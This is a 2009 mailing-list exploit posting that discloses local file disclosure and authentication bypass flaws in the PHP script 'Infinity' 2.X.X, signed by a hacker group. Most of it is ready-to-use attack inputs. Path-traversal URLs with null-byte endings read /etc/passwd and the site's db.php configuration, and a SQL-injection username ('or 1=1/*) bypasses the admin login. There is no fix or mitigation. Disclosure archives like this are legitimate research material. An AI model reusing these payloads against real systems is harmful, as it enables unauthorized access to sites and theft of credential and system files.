Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities

gamr-14 Fri, 21 Aug 2009 10:01:46 -0700

-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) 
Vulnerabilities-------------------------


Script : Infinity

version : 2.X.X

Language: PHP

Site: http://www.dimofinf.net/

Author: SwEET-DeViL



need magic_quotes_gpc = Off  <-----(<>



----------------------------------------------------------------------------------------------------------------



- +[Local File Disclosure]

#Exploit:







http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd%00





http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00





#

###

#

#----------------------------------------------------------------------------------------------------------------

- +[Auth Bypass]



http://WWW.Site.Com/inf/cp





#Exploit:





username : 'or 1=1/*



password : SwEET-DeViL



#----------------------------------------------------------------------------------------------------------------

#

###

#





/-------------www.arab4services.net-----------------\

|+------------------------------------------------+ |

||          SwEET-DeViL & viP HaCkEr              | |

||            gamr-14(at)hotmail.com              | |

|+------------------------------------------------+ |

\---------------------------------------------------/

Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities

Reply via email to